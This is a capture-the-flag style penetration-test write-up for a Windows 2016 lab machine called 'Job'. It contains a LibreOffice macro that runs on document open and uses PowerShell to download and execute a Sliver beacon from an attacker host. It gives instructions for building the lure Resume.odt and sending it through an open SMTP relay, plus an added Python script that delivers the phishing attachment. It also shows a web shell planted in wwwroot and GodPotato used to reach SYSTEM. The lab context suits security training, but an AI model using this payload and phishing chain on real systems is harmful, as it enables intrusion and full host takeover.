# Job

## Machine information

<figure><img src="/files/kaMIPA351v2K0KvVCxtE" alt=""><figcaption></figcaption></figure>

**Operating System:** Windows 2016

**Chain:** False (standalone compromise)

### Information Gathering

```sh
25/tcp   open  smtp          syn-ack ttl 127 hMailServer smtpd
80/tcp   open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
445/tcp  open  microsoft-ds? syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
```

## Service enumeration

#### HTTP:80

<figure><img src="/files/d5LtVIxVBjrpkHkcV3kG" alt=""><figcaption></figcaption></figure>

**Possible attack path:** *Please send your application to <career@job.local> ! We recently switched to using open source products - please send your cv as a libre office document.*

#### SMTP

hMailServer on port 25 is configured as an open relay: an unauthenticated client can hand it mail from any sender to any recipient and it will forward it (nmap reports that 8 of the 16 sender/recipient combinations it tries were accepted). The EHLO banner in the session below advertises `AUTH LOGIN`, but nothing in the exchange requires it. Note that delivering the lure to `career@job.local` does not by itself depend on the relay, since any mail server accepts unauthenticated mail for its own domain; the relay is a separate finding, meaning the host can be abused to send spam or spoofed mail to third parties.

```sh
❯ nmap -p25 -Pn --script smtp-open-relay 10.10.94.125
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-06 13:20 EDT
Nmap scan report for 10.10.94.125
Host is up (0.17s latency).

PORT   STATE SERVICE
25/tcp open  smtp
|_smtp-open-relay: Server is an open relay (8/16 tests)

Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds
```

## Initial Access

During the assessment, the tester configured a Sliver server and generated an HTTP beacon named `http-vulnlabs-4444.exe`, hosted on the attacker machine (10.8.5.48:8081) so the macro below can fetch it. The same beacon is reused for every later stage.

**To create the malicious macro:**

1. In LibreOffice Writer go to Tools > Macros > Organize Macros > Basic.
2. Select the document itself (not *My Macros*, so the code is stored inside the `.odt` and travels with it), create a new module and give it a name.

```visual-basic
REM  *****  BASIC  *****

Sub InitialAccess
	' Stage the Sliver beacon from the attacker's web server (10.8.5.48:8081).
	' Window style 0 hides the console; bSync = True makes Shell block until the
	' download has finished, so the beacon exists on disk before it is launched.
	Shell("cmd /c powershell IWR -URI http://10.8.5.48:8081/http-vulnlabs-4444.exe -OutFile C:\Windows\Temp\http-vulnlabs-4444.exe", 0, "", True)
	' Launch the staged beacon directly. cmd does not treat single quotes as
	' quoting, so wrapping the path in '...' would fail to find the file.
	Shell("C:\Windows\Temp\http-vulnlabs-4444.exe", 0)
End Sub
```

**To configure auto open:**

1. Go to Tools > Customize > Events tab, select the *Open Document* event, click *Macro...* and assign `InitialAccess`.
2. In the same dialog set *Save In* to the document (not *LibreOffice*) so the event binding is stored inside the file and fires on the victim's machine, then save the document as `Resume.odt`.

<figure><img src="/files/m0U05RhQTTOwIRtoYpG3" alt=""><figcaption></figcaption></figure>

```sh
❯ sendemail -t career@job.local -f john.smith@gmail.com -a Resume.odt -u "Subject: Appliction Resume" -s 10.10.94.125 -v
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
  - First line must be received within 60 seconds.
  - End manual input with a CTRL-D on its own line.
      
May 06 13:23:38 kali sendemail[83617]: Message input complete.
May 06 13:23:38 kali sendemail[83617]: DEBUG => Connecting to 10.10.94.125:25
May 06 13:23:38 kali sendemail[83617]: DEBUG => My IP address is: 10.8.5.48
May 06 13:23:38 kali sendemail[83617]: SUCCESS => Received: 	220 JOB ESMTP
May 06 13:23:38 kali sendemail[83617]: INFO => Sending: 	EHLO kali
May 06 13:23:38 kali sendemail[83617]: SUCCESS => Received: 	250-JOB, 250-SIZE 20480000, 250-AUTH LOGIN, 250 HELP
May 06 13:23:38 kali sendemail[83617]: INFO => Sending: 	MAIL FROM:<john.smith@gmail.com>
May 06 13:23:38 kali sendemail[83617]: SUCCESS => Received: 	250 OK
May 06 13:23:38 kali sendemail[83617]: INFO => Sending: 	RCPT TO:<career@job.local>
May 06 13:23:38 kali sendemail[83617]: SUCCESS => Received: 	250 OK
May 06 13:23:38 kali sendemail[83617]: INFO => Sending: 	DATA
May 06 13:23:39 kali sendemail[83617]: SUCCESS => Received: 	354 OK, send.
May 06 13:23:39 kali sendemail[83617]: INFO => Sending message body
May 06 13:23:39 kali sendemail[83617]: Setting content-type: text/plain
May 06 13:23:39 kali sendemail[83617]: DEBUG => Sending the attachment [Resume.odt]
May 06 13:23:40 kali sendemail[83617]: SUCCESS => Received: 	250 Queued (1.500 seconds)
May 06 13:23:40 kali sendemail[83617]: Email was sent successfully!  From: <john.smith@gmail.com> To: <career@job.local> Subject: [Subject: Appliction Resume] Attachment(s): [Resume.odt] Server: [10.10.94.125:25]
```
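As an added example, not code from the writeup or from nmap, hMailServer or sendemail, the Python below does the two things the SMTP section and the delivery step above relied on: it runs the same external-sender to external-recipient check that `smtp-open-relay` performs, and it delivers the macro-armed `Resume.odt` as a MIME attachment through the server. `SmtpClient` works over any object with `sendall()`/`recv()`, so `SmtpClient(socket.create_connection(("10.10.94.125", 25), timeout=10))` gives a live session against the target. `FakeRelay` is a constructed stand-in (its replies are copied from the sendemail log above) so the module runs offline, and `victim@example.net` is an assumed third-party address for the probe. With `open_relay=False` the fake behaves like a correctly configured MX, which still accepts mail for `career@job.local`: the phish does not depend on the relay misconfiguration.

```python
# Added example for this writeup, not code from the page or from hMailServer, nmap or
# sendemail: a minimal SMTP client that runs the external-to-external relay check and
# then delivers the .odt lure. FakeRelay is a constructed stand-in so it runs offline.
from email import policy
from email.message import EmailMessage

class SmtpClient:
    """Line-oriented SMTP over any object exposing sendall()/recv() (socket or FakeRelay)."""
    def __init__(self, transport):
        self.t, self.buf = transport, b""

    def reply(self):
        """Read one (possibly multi-line) reply and return its 3-digit code."""
        while True:
            while b"\r\n" not in self.buf:
                chunk = self.t.recv(4096)
                if not chunk:
                    raise ConnectionError("server closed the connection")
                self.buf += chunk
            line, self.buf = self.buf.split(b"\r\n", 1)
            if line[3:4] != b"-":            # "250-..." continues, "250 ..." ends
                return int(line[:3])

    def cmd(self, line):
        self.t.sendall(line.encode() + b"\r\n")
        return self.reply()

def probe_open_relay(client, ext_from="john.smith@gmail.com",
                     ext_to="victim@example.net", helo="kali"):
    """True when the server accepts an external sender to an external recipient
    (ext_to is an assumed third-party address). A correctly configured MX answers
    5xx to that RCPT TO; 250 is what nmap's smtp-open-relay script flags."""
    client.reply()                           # 220 banner
    client.cmd(f"EHLO {helo}")
    client.cmd(f"MAIL FROM:<{ext_from}>")
    accepted = client.cmd(f"RCPT TO:<{ext_to}>") == 250
    client.cmd("RSET")                       # drop the probe transaction
    return accepted

def deliver(client, sender, rcpt, raw):
    """Send one raw RFC 5322 message (bytes, CRLF endings); True if the server queues it."""
    if (client.cmd(f"MAIL FROM:<{sender}>") != 250 or
            client.cmd(f"RCPT TO:<{rcpt}>") != 250 or client.cmd("DATA") != 354):
        return False
    if not raw.endswith(b"\r\n"):
        raw += b"\r\n"
    # Dot-stuffing (RFC 5321 4.5.2): a body line starting with "." gets a second one.
    raw = (b"." if raw.startswith(b".") else b"") + raw.replace(b"\r\n.", b"\r\n..")
    client.t.sendall(raw)
    return client.cmd(".") == 250

def build_lure(sender, rcpt, odt_bytes, filename="Resume.odt"):
    """The phishing mail: short text body plus the macro-armed .odt as an attachment."""
    msg = EmailMessage(policy=policy.SMTP)   # CRLF line endings for the wire
    msg["From"], msg["To"], msg["Subject"] = sender, rcpt, "Application Resume"
    msg.set_content("Please find my CV attached as a LibreOffice document.\n")
    msg.add_attachment(odt_bytes, maintype="application",
                       subtype="vnd.oasis.opendocument.text", filename=filename)
    return msg

class FakeRelay:
    """Constructed stand-in for hMailServer; open_relay=False behaves like a proper MX."""
    def __init__(self, open_relay=True):
        self.open_relay, self.in_data, self.queued = open_relay, False, []
        self.pending, self.buf = b"220 JOB ESMTP\r\n", b""

    def sendall(self, data):
        self.buf += data
        while b"\r\n" in self.buf:
            line, self.buf = self.buf.split(b"\r\n", 1)
            self.pending += self._handle(line.decode(errors="replace"))

    def _handle(self, line):
        if self.in_data:                     # inside DATA until a lone "."
            if line != ".":
                self.queued.append(line)
                return b""
            self.in_data = False
            return b"250 Queued\r\n"
        verb = line.split(":")[0].split(" ")[0].upper()
        if verb == "EHLO":
            return b"250-JOB\r\n250-SIZE 20480000\r\n250-AUTH LOGIN\r\n250 HELP\r\n"
        if verb == "RCPT":                   # the relay decision happens here
            local = line.lower().rstrip(">").endswith("@job.local")
            return b"250 OK\r\n" if local or self.open_relay else b"550 Relaying denied\r\n"
        if verb == "DATA":
            self.in_data = True
            return b"354 OK, send.\r\n"
        return b"250 OK\r\n"                 # MAIL, RSET, QUIT, ...

    def recv(self, n):
        out, self.pending = self.pending[:n], self.pending[n:]
        return out
```

`queued` on the fake server keeps every line that passed the DATA stage, which is a convenient place to check that the attachment part really carries the `application/vnd.oasis.opendocument.text` type the target's instructions ask for.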

<figure><img src="/files/abCrXVQzT3fJZvWKuzWj" alt=""><figcaption></figcaption></figure>

### Lateral movement as IIS APPPOOL\DefaultAppPool

During enumeration as `jack.black`, the beacon's token showed membership of `JOB\developers`. The output below lists it as type `Alias`, i.e. a local group on this standalone host rather than a domain group, and that group holds Full control (`F`) over `C:\inetpub\wwwroot` with container and object inheritance (`(CI)(OI)`), so any file dropped there is served by IIS.

```sh
sliver (http-vulnlabs-4444) > sa-whoami 

[*] Successfully executed sa-whoami (coff-loader)
[*] Got output:

UserName		SID
====================== ====================================
JOB\jack.black	S-1-5-21-3629909232-404814612-4151782453-1000


GROUP INFORMATION                                 Type                     SID                                          Attributes               
================================================= ===================== ============================================= ==================================================
JOB\None                                          Group                    S-1-5-21-3629909232-404814612-4151782453-513  Mandatory group, Enabled by default, Enabled group, 
Everyone                                          Well-known group         S-1-1-0                                       Mandatory group, Enabled by default, Enabled group, 
JOB\developers                                    Alias                    S-1-5-21-3629909232-404814612-4151782453-1001 Mandatory group, Enabled by default, Enabled group, 
<SNIP>

```

```sh
sliver (http-vulnlabs-4444) > sa-cacls wwwroot

[*] Successfully executed sa-cacls (coff-loader)
[*] Got output:
C:\inetpub\wwwroot JOB\developers:(CI)(OI)F
```

#### Uploading an Antak web shell

```sh
sliver (http-vulnlabs-4444) > upload /usr/share/nishang/Antak-WebShell/antak.aspx

[*] Wrote file to C:\inetpub\wwwroot\antak.aspx
```

#### Getting a reverse shell using Sliver as IIS APPPOOL\DefaultAppPool

<figure><img src="/files/pth6pmUSIfHbIak613AK" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/60lTaUpx0oztgLgB0Gam" alt=""><figcaption></figcaption></figure>

```sh
sliver (http-vulnlabs-4444) > whoami

Logon ID: <err>
[*] Current Token ID: IIS APPPOOL\DefaultAppPool
```

## Privilege escalation to NT AUTHORITY\SYSTEM

**Binary:** [GodPotato-NET4.exe](https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe)

The IIS application pool identity holds `SeImpersonatePrivilege` (visible with `whoami /priv` from the web shell or the beacon). GodPotato abuses the local RPCSS/DCOM service to obtain a SYSTEM token and impersonates it, so the command passed to it (here another copy of the Sliver beacon) runs as `NT AUTHORITY\SYSTEM`.

<figure><img src="/files/mdRfJAuwUfIVOSCXHYbc" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/XkLTCeArVPsjStPwvJue" alt=""><figcaption></figcaption></figure>

